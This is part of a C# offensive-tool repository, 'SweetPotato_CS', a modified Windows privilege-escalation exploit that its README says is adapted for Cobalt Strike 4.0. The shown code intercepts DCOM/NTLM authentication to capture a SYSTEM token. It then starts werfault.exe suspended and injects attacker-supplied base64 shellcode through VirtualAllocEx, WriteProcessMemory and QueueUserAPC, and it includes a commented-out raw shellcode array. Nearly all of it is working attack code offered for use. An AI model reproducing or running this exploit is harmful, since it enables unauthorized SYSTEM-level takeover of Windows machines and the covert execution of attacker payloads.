Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp); 129 | rpcSocket.Connect(new IPEndPoint(IPAddress.Loopback, 135)); 130 | 131 | byte[] buffer = new byte[4096]; 132 | int recvLen = 0; 133 | int sendLen = 0; 134 | 135 | while ((recvLen = clientSocket.Receive(buffer)) > 0) { 136 | byte[] received = new byte[recvLen]; 137 | Array.Copy(buffer, received, received.Length); 138 | 139 | ProcessNTLMBytes(received); 140 | 141 | if (negotiator.Authenticated) { 142 | break; 143 | } 144 | 145 | sendLen = rpcSocket.Send(received); 146 | recvLen = rpcSocket.Receive(buffer); 147 | 148 | if (recvLen == 0) { 149 | break; 150 | } 151 | 152 | received = new byte[recvLen]; 153 | Array.Copy(buffer, received, received.Length); 154 | 155 | ProcessNTLMBytes(received); 156 | sendLen = clientSocket.Send(received); 157 | 158 | if (listenSocket.Poll(100000, SelectMode.SelectRead)) { 159 | clientSocket.Close(); 160 | clientSocket = listenSocket.Accept(); 161 | rpcSocket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp); 162 | rpcSocket.Connect(new IPEndPoint(IPAddress.Loopback, 135)); 163 | } 164 | } 165 | 166 | try { 167 | clientSocket.Close(); 168 | rpcSocket.Close(); 169 | listenSocket.Close(); 170 | } finally { } 171 | 172 | } catch (Exception e) { 173 | Console.WriteLine("[!] COM Listener thread failed: {0}", e.Message); 174 | readyEvent.Set(); 175 | } 176 | } 177 | 178 | public bool TriggerDCOM() { 179 | 180 | int result = 0; 181 | 182 | try { 183 | 184 | if (!fakeWinRM) { 185 | result = Ole32.CreateILockBytesOnHGlobal(IntPtr.Zero, true, out ILockBytes lockBytes); 186 | result = Ole32.StgCreateDocfileOnILockBytes(lockBytes, Ole32.STGM.CREATE | Ole32.STGM.READWRITE | Ole32.STGM.SHARE_EXCLUSIVE, 0, out IStorage storage); 187 | StorageTrigger storageTrigger = new StorageTrigger(storage, string.Format("127.0.0.1[{0}]", port), TowerProtocol.EPM_PROTOCOL_TCP); 188 | 189 | Ole32.MULTI_QI[] qis = new Ole32.MULTI_QI[1]; 190 | qis[0].pIID = Ole32.IID_IUnknownPtr; 191 | 192 | result = Ole32.CoGetInstanceFromIStorage(null, ref clsId, null, Ole32.CLSCTX.CLSCTX_LOCAL_SERVER, storageTrigger, 1, qis); 193 | } else { 194 | 195 | Type comType = Type.GetTypeFromCLSID(clsId); 196 | var instance = Activator.CreateInstance(comType); 197 | } 198 | 199 | } catch (Exception e) { 200 | if (!negotiator.Authenticated) 201 | Console.Write(String.Format("{0}\n", e.Message)); 202 | } 203 | 204 | dcomComplete = true; 205 | return negotiator.Authenticated; 206 | } 207 | 208 | int FindNTLMBytes(byte[] bytes) { 209 | //Find the NTLM bytes in a packet and return the index to the start of the NTLMSSP header. 210 | //The NTLM bytes (for our purposes) are always at the end of the packet, so when we find the header, 211 | //we can just return the index 212 | byte[] pattern = { 0x4E, 0x54, 0x4C, 0x4D, 0x53, 0x53, 0x50 }; 213 | int pIdx = 0; 214 | int i; 215 | for (i = 0; i < bytes.Length; i++) { 216 | if (bytes[i] == pattern[pIdx]) { 217 | pIdx = pIdx + 1; 218 | if (pIdx == 7) return (i - 6); 219 | } else { 220 | pIdx = 0; 221 | } 222 | } 223 | return -1; 224 | } 225 | 226 | int ProcessNTLMBytes(byte[] bytes) { 227 | 228 | int ntlmLoc = FindNTLMBytes(bytes); 229 | if (ntlmLoc == -1) return -1; 230 | 231 | byte[] ntlm = new byte[bytes.Length - ntlmLoc]; 232 | Array.Copy(bytes, ntlmLoc, ntlm, 0, ntlm.Length); 233 | 234 | int messageType = bytes[ntlmLoc + 8]; 235 | switch (messageType) { 236 | case 1: 237 | //NTLM type 1 message 238 | return negotiator.HandleType1(ntlm); 239 | case 2: 240 | //NTLM type 2 message 241 | int result = negotiator.HandleType2(ntlm); 242 | Array.Copy(ntlm, 0, bytes, ntlmLoc, ntlm.Length); 243 | return result; 244 | 245 | case 3: 246 | //NTLM type 3 message 247 | return negotiator.HandleType3(ntlm); 248 | default: 249 | Console.WriteLine("Error - Unknown NTLM message type..."); 250 | return -1; 251 | } 252 | } 253 | } 254 | } 255 | -------------------------------------------------------------------------------- /Program.cs: -------------------------------------------------------------------------------- 1 | using Microsoft.Win32; 2 | using Mono.Options; 3 | using System; 4 | using System.Runtime.InteropServices; 5 | using System.Security.Principal; 6 | using System.Threading; 7 | using static SweetPotato.ImpersonationToken; 8 | 9 | namespace SweetPotato { 10 | class Program { 11 | #region shellcode inject 12 | private static UInt32 MEM_COMMIT = 0x1000; 13 | private static UInt32 PAGE_EXECUTE_READWRITE = 0x40; //I'm not using this #DFIR ;-) 14 | private static UInt32 PAGE_READWRITE = 0x04; 15 | private static UInt32 PAGE_EXECUTE_READ = 0x20; 16 | 17 | [Flags] 18 | public enum ProcessAccessFlags : uint 19 | { 20 | All = 0x001F0FFF, 21 | Terminate = 0x00000001, 22 | CreateThread = 0x00000002, 23 | VirtualMemoryOperation = 0x00000008, 24 | VirtualMemoryRead = 0x00000010, 25 | VirtualMemoryWrite = 0x00000020, 26 | DuplicateHandle = 0x00000040, 27 | CreateProcess = 0x000000080, 28 | SetQuota = 0x00000100, 29 | SetInformation = 0x00000200, 30 | QueryInformation = 0x00000400, 31 | QueryLimitedInformation = 0x00001000, 32 | Synchronize = 0x00100000 33 | } 34 | 35 | [Flags] 36 | public enum ProcessCreationFlags : uint 37 | { 38 | ZERO_FLAG = 0x00000000, 39 | CREATE_BREAKAWAY_FROM_JOB = 0x01000000, 40 | CREATE_DEFAULT_ERROR_MODE = 0x04000000, 41 | CREATE_NEW_CONSOLE = 0x00000010, 42 | CREATE_NEW_PROCESS_GROUP = 0x00000200, 43 | CREATE_NO_WINDOW = 0x08000000, 44 | CREATE_PROTECTED_PROCESS = 0x00040000, 45 | CREATE_PRESERVE_CODE_AUTHZ_LEVEL = 0x02000000, 46 | CREATE_SEPARATE_WOW_VDM = 0x00001000, 47 | CREATE_SHARED_WOW_VDM = 0x00001000, 48 | CREATE_SUSPENDED = 0x00000004, 49 | CREATE_UNICODE_ENVIRONMENT = 0x00000400, 50 | DEBUG_ONLY_THIS_PROCESS = 0x00000002, 51 | DEBUG_PROCESS = 0x00000001, 52 | DETACHED_PROCESS = 0x00000008, 53 | EXTENDED_STARTUPINFO_PRESENT = 0x00080000, 54 | INHERIT_PARENT_AFFINITY = 0x00010000 55 | } 56 | /* 57 | public struct PROCESS_INFORMATION 58 | { 59 | public IntPtr hProcess; 60 | public IntPtr hThread; 61 | public uint dwProcessId; 62 | public uint dwThreadId; 63 | } 64 | public struct STARTUPINFO 65 | { 66 | public uint cb; 67 | public string lpReserved; 68 | public string lpDesktop; 69 | public string lpTitle; 70 | public uint dwX; 71 | public uint dwY; 72 | public uint dwXSize; 73 | public uint dwYSize; 74 | public uint dwXCountChars; 75 | public uint dwYCountChars; 76 | public uint dwFillAttribute; 77 | public uint dwFlags; 78 | public short wShowWindow; 79 | public short cbReserved2; 80 | public IntPtr lpReserved2; 81 | public IntPtr hStdInput; 82 | public IntPtr hStdOutput; 83 | public IntPtr hStdError; 84 | } 85 | */ 86 | [Flags] 87 | public enum ThreadAccess : int 88 | { 89 | TERMINATE = (0x0001), 90 | SUSPEND_RESUME = (0x0002), 91 | GET_CONTEXT = (0x0008), 92 | SET_CONTEXT = (0x0010), 93 | SET_INFORMATION = (0x0020), 94 | QUERY_INFORMATION = (0x0040), 95 | SET_THREAD_TOKEN = (0x0080), 96 | IMPERSONATE = (0x0100), 97 | DIRECT_IMPERSONATION = (0x0200) 98 | } 99 | 100 | [DllImport("kernel32.dll", SetLastError = true)] 101 | public static extern IntPtr OpenThread(ThreadAccess dwDesiredAccess, bool bInheritHandle, 102 | int dwThreadId); 103 | 104 | [DllImport("kernel32.dll", SetLastError = true)] 105 | public static extern bool WriteProcessMemory( 106 | IntPtr hProcess, 107 | IntPtr lpBaseAddress, 108 | byte[] lpBuffer, 109 | int nSize, 110 | out IntPtr lpNumberOfBytesWritten); 111 | 112 | [DllImport("kernel32.dll")] 113 | public static extern IntPtr QueueUserAPC(IntPtr pfnAPC, IntPtr hThread, IntPtr dwData); 114 | 115 | [DllImport("kernel32")] 116 | public static extern IntPtr VirtualAlloc(UInt32 lpStartAddr, 117 | Int32 size, UInt32 flAllocationType, UInt32 flProtect); 118 | [DllImport("kernel32.dll", SetLastError = true)] 119 | public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, 120 | Int32 dwSize, UInt32 flAllocationType, UInt32 flProtect); 121 | 122 | [DllImport("kernel32.dll", SetLastError = true)] 123 | public static extern IntPtr OpenProcess( 124 | ProcessAccessFlags processAccess, 125 | bool bInheritHandle, 126 | int processId 127 | ); 128 | 129 | [DllImport("kernel32.dll")] 130 | public static extern bool CreateProcess(string lpApplicationName, string lpCommandLine, IntPtr lpProcessAttributes, IntPtr lpThreadAttributes, bool bInheritHandles, ProcessCreationFlags dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation); 131 | [DllImport("kernel32.dll")] 132 | public static extern uint ResumeThread(IntPtr hThread); 133 | [DllImport("kernel32.dll")] 134 | public static extern uint SuspendThread(IntPtr hThread); 135 | [DllImport("kernel32.dll")] 136 | public static extern bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress, 137 | int dwSize, uint flNewProtect, out uint lpflOldProtect); 138 | #endregion 139 | 140 | static void PrintHelp(OptionSet options) { 141 | options.WriteOptionDescriptions(Console.Out); 142 | } 143 | 144 | static bool IsBITSRequired() { 145 | 146 | if(Environment.OSVersion.Version.Major < 10) { 147 | return false; 148 | } 149 | 150 | RegistryKey registryKey = Registry.LocalMachine.OpenSubKey(@"SOFTWARE\Microsoft\Windows NT\CurrentVersion"); 151 | var buildNumber = UInt32.Parse(registryKey.GetValue("ReleaseId").ToString()); 152 | 153 | if(buildNumber <= 1809) { 154 | return false; 155 | } 156 | 157 | return true; 158 | } 159 | 160 | static void Main(string[] args) { 161 | 162 | string clsId = "4991D34B-80A1-4291-83B6-3328366B9097"; 163 | ushort port = 6666; 164 | string program = @"c:\Windows\System32\werfault.exe"; 165 | string shellcode = null; 166 | ExecutionMethod executionMethod = ExecutionMethod.Auto; 167 | bool showHelp = false; 168 | bool isBITSRequired = false; 169 | 170 | Console.WriteLine( 171 | "[+] SweetPotato by @_EthicalChaos_,fixed by 2020/4/16\n"); 172 | 173 | OptionSet option_set = new OptionSet() 174 | .Add("c=|clsid=", "CLSID (default BITS: 4991D34B-80A1-4291-83B6-3328366B9097)", v => clsId = v) 175 | .Add("m=|method=", "Auto,User,Thread (default Auto)", v => executionMethod = v) 176 | .Add("p=|prog=", "Run a Process (werfault.exe)", v => program = v) 177 | .Add("s=|shellcode=", "Arguments for program (default null)", v => shellcode = v) 178 | .Add("l=|listenPort=", "COM server listen port (default 6666)", v => port = v) 179 | .Add("h|help", "Display this help", v => showHelp = v != null); 180 | 181 | try { 182 | 183 | option_set.Parse(args); 184 | 185 | if (showHelp) { 186 | PrintHelp(option_set); 187 | return; 188 | } 189 | 190 | } catch (Exception e) { 191 | Console.WriteLine("[!] Failed to parse arguments: {0}", e.Message); 192 | PrintHelp(option_set); 193 | return; 194 | } 195 | 196 | try { 197 | 198 | if ( isBITSRequired = IsBITSRequired()) { 199 | clsId = "4991D34B-80A1-4291-83B6-3328366B9097"; 200 | Console.WriteLine("[=] Your version of Windows fixes DCOM interception forcing BITS to perform WinRM intercept"); 201 | return; 202 | } 203 | 204 | bool hasImpersonate = EnablePrivilege(SecurityEntity.SE_IMPERSONATE_NAME); 205 | bool hasPrimary = EnablePrivilege(SecurityEntity.SE_ASSIGNPRIMARYTOKEN_NAME); 206 | bool hasIncreaseQuota = EnablePrivilege(SecurityEntity.SE_INCREASE_QUOTA_NAME); 207 | 208 | if(!hasImpersonate && !hasPrimary) { 209 | Console.WriteLine("[!] Cannot perform NTLM interception, neccessary priveleges missing. Are you running under a Service account?"); 210 | return; 211 | } 212 | 213 | if (executionMethod == ExecutionMethod.Auto) { 214 | if (hasImpersonate) { 215 | executionMethod = ExecutionMethod.Token; 216 | } else if (hasPrimary) { 217 | executionMethod = ExecutionMethod.User; 218 | } 219 | } 220 | 221 | Console.WriteLine("[+] Attempting {0} with CLID {1} on port {2} using method {3} to launch {4}", 222 | isBITSRequired ? "NTLM Auth" : "DCOM NTLM interception", clsId, isBITSRequired ? 5985 : port, executionMethod, program); 223 | 224 | PotatoAPI potatoAPI = new PotatoAPI(new Guid(clsId), port, isBITSRequired); 225 | 226 | if (!potatoAPI.TriggerDCOM()) { 227 | Console.WriteLine("[!] No authenticated interception took place, exploit failed"); 228 | return; 229 | } 230 | 231 | Console.WriteLine("[+] Intercepted and authenticated successfully, launching program"); 232 | 233 | IntPtr impersonatedPrimary; 234 | 235 | if (!DuplicateTokenEx(potatoAPI.Token, TOKEN_ALL_ACCESS, IntPtr.Zero, 236 | SECURITY_IMPERSONATION_LEVEL.SecurityIdentification, TOKEN_TYPE.TokenPrimary, out impersonatedPrimary)) { 237 | Console.WriteLine("[!] Failed to impersonate security context token"); 238 | return; 239 | } 240 | 241 | Thread systemThread = new Thread(() => { 242 | SetThreadToken(IntPtr.Zero, potatoAPI.Token); 243 | STARTUPINFO si = new STARTUPINFO(); 244 | PROCESS_INFORMATION pi = new PROCESS_INFORMATION(); 245 | si.cb = Marshal.SizeOf(si); 246 | si.lpDesktop = @"WinSta0\Default"; 247 | 248 | Console.WriteLine("[+] Created launch thread using impersonated user {0}", WindowsIdentity.GetCurrent(true).Name); 249 | 250 | string finalArgs = null; 251 | /* 252 | if(shellcode != null) 253 | finalArgs = string.Format("\"{0}\" {1}", program, args); 254 | */ 255 | if (executionMethod == ExecutionMethod.Token) { 256 | if (!CreateProcessWithTokenW(potatoAPI.Token, 0, program, finalArgs, CreationFlags.Suspended, IntPtr.Zero, null, ref si, out pi)) { 257 | Console.WriteLine("[!] Failed to created impersonated process with token: {0}", Marshal.GetLastWin32Error()); 258 | return; 259 | } 260 | } else { 261 | if (!CreateProcessAsUserW(impersonatedPrimary, program, finalArgs, IntPtr.Zero, 262 | IntPtr.Zero, false, 0x00000004, IntPtr.Zero, @"C:\", ref si, out pi)) { 263 | Console.WriteLine("[!] Failed to created impersonated process with user: {0} ", Marshal.GetLastWin32Error()); 264 | return; 265 | } 266 | } 267 | byte[] b_shellcode = Convert.FromBase64String(shellcode); 268 | //byte[] shellcode = new byte[112] {0x50,0x51,0x52,0x53,0x56,0x57,0x55,0x54,0x58,0x66,0x83,0xe4,0xf0,0x50,0x6a,0x60,0x5a,0x68,0x63,0x61,0x6c,0x63,0x54,0x59,0x48,0x29,0xd4,0x65,0x48,0x8b,0x32,0x48,0x8b,0x76,0x18,0x48,0x8b,0x76,0x10,0x48,0xad,0x48,0x8b,0x30,0x48,0x8b,0x7e,0x30,0x03,0x57,0x3c,0x8b,0x5c,0x17,0x28,0x8b,0x74,0x1f,0x20,0x48,0x01,0xfe,0x8b,0x54,0x1f,0x24,0x0f,0xb7,0x2c,0x17,0x8d,0x52,0x02,0xad,0x81,0x3c,0x07,0x57,0x69,0x6e,0x45,0x75,0xef,0x8b,0x74,0x1f,0x1c,0x48,0x01,0xfe,0x8b,0x34,0xae,0x48,0x01,0xf7,0x99,0xff,0xd7,0x48,0x83,0xc4,0x68,0x5c,0x5d,0x5f,0x5e,0x5b,0x5a,0x59,0x58,0xc3}; 269 | // Allocate memory within process and write shellcode 270 | IntPtr resultPtr = VirtualAllocEx(pi.hProcess, IntPtr.Zero, b_shellcode.Length, MEM_COMMIT, PAGE_READWRITE); 271 | IntPtr bytesWritten = IntPtr.Zero; 272 | //Marshal.Copy(b_shellcode, 0, resultPtr, b_shellcode.Length); 273 | bool resultBool = WriteProcessMemory(pi.hProcess, resultPtr, b_shellcode, b_shellcode.Length, out bytesWritten); 274 | 275 | // Open thread 276 | IntPtr sht = OpenThread(ThreadAccess.SET_CONTEXT, false, (int)pi.dwThreadId); 277 | uint oldProtect = 0; 278 | 279 | // Modify memory permissions on allocated shellcode 280 | resultBool = VirtualProtectEx(pi.hProcess, resultPtr, b_shellcode.Length, PAGE_EXECUTE_READ, out oldProtect); 281 | 282 | // Assign address of shellcode to the target thread apc queue 283 | IntPtr ptr = QueueUserAPC(resultPtr, sht, IntPtr.Zero); 284 | 285 | IntPtr ThreadHandle = pi.hThread; 286 | ResumeThread(ThreadHandle); 287 | Console.WriteLine("[+] Process created, enjoy!"); 288 | }); 289 | 290 | systemThread.Start(); 291 | systemThread.Join(); 292 | 293 | } catch (Exception e) { 294 | Console.WriteLine("[!] Failed to exploit COM: {0} ", e.Message); 295 | Console.WriteLine(e.StackTrace.ToString()); 296 | } 297 | } 298 | } 299 | } 300 | -------------------------------------------------------------------------------- /Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("SharpPotato")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("SharpPotato")] 13 | [assembly: AssemblyCopyright("Copyright © 2020")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("1bf9c10f-6f89-4520-9d2e-aaf17d17ba5e")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # SweetPotato_CS 2 | 修改的SweetPotato,使之可以用于CobaltStrike v4.0 3 | 4 | ![image-20200416161314722](https://tva1.sinaimg.cn/large/007S8ZIlgy1gdvoe062kej325f0u0jy7.jpg) -------------------------------------------------------------------------------- /Security/Privilege.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.ComponentModel; 3 | using System.Globalization; 4 | using System.Runtime.InteropServices; 5 | 6 | namespace SweetPotato { 7 | public class ImpersonationToken { 8 | // Constants that are going to be used during our procedure. 9 | public static uint SE_PRIVILEGE_ENABLED = 0x00000002; 10 | public static uint STANDARD_RIGHTS_REQUIRED = 0x000F0000; 11 | public static uint STANDARD_RIGHTS_READ = 0x00020000; 12 | public static uint TOKEN_ASSIGN_PRIMARY = 0x00000001; 13 | public static uint TOKEN_DUPLICATE = 0x00000002; 14 | public static uint TOKEN_IMPERSONATE = 0x00000004; 15 | public static uint TOKEN_QUERY = 0x00000008; 16 | public static uint TOKEN_QUERY_SOURCE = 0x00000010; 17 | public static uint TOKEN_ADJUST_PRIVILEGES = 0x00000020; 18 | public static uint TOKEN_ADJUST_GROUPS = 0x00000040; 19 | public static uint TOKEN_ADJUST_DEFAULT = 0x00000080; 20 | public static uint TOKEN_ADJUST_SESSIONID = 0x00000100; 21 | public static uint TOKEN_READ = STANDARD_RIGHTS_READ | TOKEN_QUERY; 22 | public static uint TOKEN_ALL_ACCESS = STANDARD_RIGHTS_REQUIRED | TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE | TOKEN_IMPERSONATE | TOKEN_QUERY | TOKEN_QUERY_SOURCE | TOKEN_ADJUST_PRIVILEGES | TOKEN_ADJUST_GROUPS | TOKEN_ADJUST_DEFAULT | TOKEN_ADJUST_SESSIONID; 23 | public static uint MAXIMUM_ALLOWED = 0x02000000; 24 | 25 | public static uint DETACHED_PROCESS = 0x00000008; 26 | public static uint CREATE_NEW_CONSOLE = 0x00000010; 27 | 28 | 29 | public enum SECURITY_IMPERSONATION_LEVEL { 30 | SecurityAnonymous, 31 | SecurityIdentification, 32 | SecurityImpersonation, 33 | SecurityDelegation 34 | } 35 | 36 | public enum TOKEN_TYPE { 37 | TokenPrimary = 1, 38 | TokenImpersonation 39 | } 40 | 41 | [StructLayout(LayoutKind.Sequential)] 42 | internal struct LUID { 43 | internal Int32 LowPart; 44 | internal UInt32 HighPart; 45 | } 46 | 47 | [StructLayout(LayoutKind.Sequential)] 48 | internal struct TOKEN_PRIVILEGES { 49 | internal Int32 PrivilegeCount; 50 | internal LUID Luid; 51 | internal UInt32 Attributes; 52 | } 53 | 54 | // This also works with CharSet.Ansi as long as the calling function uses the same character set. 55 | [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] 56 | public struct STARTUPINFO { 57 | public Int32 cb; 58 | public string lpReserved; 59 | public string lpDesktop; 60 | public string lpTitle; 61 | public Int32 dwX; 62 | public Int32 dwY; 63 | public Int32 dwXSize; 64 | public Int32 dwYSize; 65 | public Int32 dwXCountChars; 66 | public Int32 dwYCountChars; 67 | public Int32 dwFillAttribute; 68 | public Int32 dwFlags; 69 | public Int16 wShowWindow; 70 | public Int16 cbReserved2; 71 | public IntPtr lpReserved2; 72 | public IntPtr hStdInput; 73 | public IntPtr hStdOutput; 74 | public IntPtr hStdError; 75 | } 76 | 77 | [StructLayout(LayoutKind.Sequential)] 78 | public struct PROCESS_INFORMATION { 79 | public IntPtr hProcess; 80 | public IntPtr hThread; 81 | public int dwProcessId; 82 | public int dwThreadId; 83 | } 84 | 85 | public enum LogonFlags { 86 | WithProfile = 1, 87 | NetCredentialsOnly 88 | } 89 | 90 | public enum CreationFlags { 91 | DefaultErrorMode = 0x04000000, 92 | DetachedProcess = 0x00000008, 93 | NewConsole = 0x00000010, 94 | NewProcessGroup = 0x00000200, 95 | SeparateWOWVDM = 0x00000800, 96 | Suspended = 0x00000004, 97 | UnicodeEnvironment = 0x00000400, 98 | ExtendedStartupInfoPresent = 0x00080000 99 | } 100 | 101 | public enum SecurityEntity { 102 | SE_CREATE_TOKEN_NAME, 103 | SE_ASSIGNPRIMARYTOKEN_NAME, 104 | SE_LOCK_MEMORY_NAME, 105 | SE_INCREASE_QUOTA_NAME, 106 | SE_UNSOLICITED_INPUT_NAME, 107 | SE_MACHINE_ACCOUNT_NAME, 108 | SE_TCB_NAME, 109 | SE_SECURITY_NAME, 110 | SE_TAKE_OWNERSHIP_NAME, 111 | SE_LOAD_DRIVER_NAME, 112 | SE_SYSTEM_PROFILE_NAME, 113 | SE_SYSTEMTIME_NAME, 114 | SE_PROF_SINGLE_PROCESS_NAME, 115 | SE_INC_BASE_PRIORITY_NAME, 116 | SE_CREATE_PAGEFILE_NAME, 117 | SE_CREATE_PERMANENT_NAME, 118 | SE_BACKUP_NAME, 119 | SE_RESTORE_NAME, 120 | SE_SHUTDOWN_NAME, 121 | SE_DEBUG_NAME, 122 | SE_AUDIT_NAME, 123 | SE_SYSTEM_ENVIRONMENT_NAME, 124 | SE_CHANGE_NOTIFY_NAME, 125 | SE_REMOTE_SHUTDOWN_NAME, 126 | SE_UNDOCK_NAME, 127 | SE_SYNC_AGENT_NAME, 128 | SE_ENABLE_DELEGATION_NAME, 129 | SE_MANAGE_VOLUME_NAME, 130 | SE_IMPERSONATE_NAME, 131 | SE_CREATE_GLOBAL_NAME, 132 | SE_CREATE_SYMBOLIC_LINK_NAME, 133 | SE_INC_WORKING_SET_NAME, 134 | SE_RELABEL_NAME, 135 | SE_TIME_ZONE_NAME, 136 | SE_TRUSTED_CREDMAN_ACCESS_NAME 137 | } 138 | 139 | [DllImport("advapi32", SetLastError = true, CharSet = CharSet.Unicode)] 140 | public static extern bool CreateProcessWithTokenW(IntPtr hToken, LogonFlags dwLogonFlags, string lpApplicationName, string lpCommandLine, 141 | CreationFlags dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, [In] ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation); 142 | 143 | [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)] 144 | public static extern bool CreateProcessAsUserW(IntPtr hToken, string lpApplicationName, string lpCommandLine, IntPtr lpProcessAttributes, IntPtr lpThreadAttributes, 145 | bool bInheritHandles, uint dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation); 146 | 147 | [DllImport("kernel32.dll")] 148 | public static extern uint WTSGetActiveConsoleSessionId(); 149 | 150 | [DllImport("advapi32.dll", CharSet = CharSet.Unicode, SetLastError = true)] 151 | [return: MarshalAs(UnmanagedType.Bool)] 152 | internal static extern bool LookupPrivilegeValue(string lpsystemname, string lpname, [MarshalAs(UnmanagedType.Struct)] ref LUID lpLuid); 153 | 154 | [DllImport("advapi32.dll", CharSet = CharSet.Unicode, SetLastError = true)] 155 | [return: MarshalAs(UnmanagedType.Bool)] 156 | internal static extern bool AdjustTokenPrivileges(IntPtr tokenhandle, 157 | [MarshalAs(UnmanagedType.Bool)] bool disableAllPrivileges, 158 | [MarshalAs(UnmanagedType.Struct)]ref TOKEN_PRIVILEGES newstate, 159 | uint bufferlength, IntPtr previousState, IntPtr returnlength); 160 | // OpenProcessToken 161 | [DllImport("advapi32.dll", SetLastError = true)] 162 | [return: MarshalAs(UnmanagedType.Bool)] 163 | public static extern bool OpenProcessToken(IntPtr ProcessHandle, UInt32 DesiredAccess, out IntPtr TokenHandle); 164 | 165 | [DllImport("advapi32.dll", CharSet = CharSet.Auto, SetLastError = true)] 166 | public extern static bool DuplicateTokenEx(IntPtr hExistingToken, uint dwDesiredAccess, IntPtr lpTokenAttributes, 167 | SECURITY_IMPERSONATION_LEVEL ImpersonationLevel, TOKEN_TYPE TokenType, out IntPtr phNewToken); 168 | 169 | [DllImport("advapi32.dll", SetLastError = true)] 170 | public static extern bool SetThreadToken(IntPtr pHandle, IntPtr hToken); 171 | 172 | [DllImport("kernel32.dll", SetLastError = true)] 173 | public static extern IntPtr GetCurrentProcess(); 174 | 175 | [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)] 176 | [return: MarshalAs(UnmanagedType.Bool)] 177 | internal static extern Boolean CloseHandle(IntPtr hObject); 178 | 179 | [DllImport("userenv.dll", SetLastError = true)] 180 | public static extern bool CreateEnvironmentBlock(out IntPtr lpEnvironment, IntPtr hToken, bool bInherit); 181 | 182 | private static string GetSecurityEntityValue(SecurityEntity securityEntity) { 183 | switch (securityEntity) { 184 | case SecurityEntity.SE_ASSIGNPRIMARYTOKEN_NAME: 185 | return "SeAssignPrimaryTokenPrivilege"; 186 | case SecurityEntity.SE_AUDIT_NAME: 187 | return "SeAuditPrivilege"; 188 | case SecurityEntity.SE_BACKUP_NAME: 189 | return "SeBackupPrivilege"; 190 | case SecurityEntity.SE_CHANGE_NOTIFY_NAME: 191 | return "SeChangeNotifyPrivilege"; 192 | case SecurityEntity.SE_CREATE_GLOBAL_NAME: 193 | return "SeCreateGlobalPrivilege"; 194 | case SecurityEntity.SE_CREATE_PAGEFILE_NAME: 195 | return "SeCreatePagefilePrivilege"; 196 | case SecurityEntity.SE_CREATE_PERMANENT_NAME: 197 | return "SeCreatePermanentPrivilege"; 198 | case SecurityEntity.SE_CREATE_SYMBOLIC_LINK_NAME: 199 | return "SeCreateSymbolicLinkPrivilege"; 200 | case SecurityEntity.SE_CREATE_TOKEN_NAME: 201 | return "SeCreateTokenPrivilege"; 202 | case SecurityEntity.SE_DEBUG_NAME: 203 | return "SeDebugPrivilege"; 204 | case SecurityEntity.SE_ENABLE_DELEGATION_NAME: 205 | return "SeEnableDelegationPrivilege"; 206 | case SecurityEntity.SE_IMPERSONATE_NAME: 207 | return "SeImpersonatePrivilege"; 208 | case SecurityEntity.SE_INC_BASE_PRIORITY_NAME: 209 | return "SeIncreaseBasePriorityPrivilege"; 210 | case SecurityEntity.SE_INCREASE_QUOTA_NAME: 211 | return "SeIncreaseQuotaPrivilege"; 212 | case SecurityEntity.SE_INC_WORKING_SET_NAME: 213 | return "SeIncreaseWorkingSetPrivilege"; 214 | case SecurityEntity.SE_LOAD_DRIVER_NAME: 215 | return "SeLoadDriverPrivilege"; 216 | case SecurityEntity.SE_LOCK_MEMORY_NAME: 217 | return "SeLockMemoryPrivilege"; 218 | case SecurityEntity.SE_MACHINE_ACCOUNT_NAME: 219 | return "SeMachineAccountPrivilege"; 220 | case SecurityEntity.SE_MANAGE_VOLUME_NAME: 221 | return "SeManageVolumePrivilege"; 222 | case SecurityEntity.SE_PROF_SINGLE_PROCESS_NAME: 223 | return "SeProfileSingleProcessPrivilege"; 224 | case SecurityEntity.SE_RELABEL_NAME: 225 | return "SeRelabelPrivilege"; 226 | case SecurityEntity.SE_REMOTE_SHUTDOWN_NAME: 227 | return "SeRemoteShutdownPrivilege"; 228 | case SecurityEntity.SE_RESTORE_NAME: 229 | return "SeRestorePrivilege"; 230 | case SecurityEntity.SE_SECURITY_NAME: 231 | return "SeSecurityPrivilege"; 232 | case SecurityEntity.SE_SHUTDOWN_NAME: 233 | return "SeShutdownPrivilege"; 234 | case SecurityEntity.SE_SYNC_AGENT_NAME: 235 | return "SeSyncAgentPrivilege"; 236 | case SecurityEntity.SE_SYSTEM_ENVIRONMENT_NAME: 237 | return "SeSystemEnvironmentPrivilege"; 238 | case 